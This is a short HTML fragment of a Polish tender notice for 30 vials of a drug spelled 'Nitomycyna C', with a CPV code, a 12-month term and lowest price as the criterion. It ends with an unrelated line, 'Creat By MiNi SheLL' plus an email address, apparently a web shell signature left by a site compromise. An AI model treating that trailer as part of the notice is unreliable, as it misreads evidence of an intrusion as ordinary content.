<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PAKIET 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Nitomycyna C - 0,002g substancji czynnej w 1 fiolce	szt.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com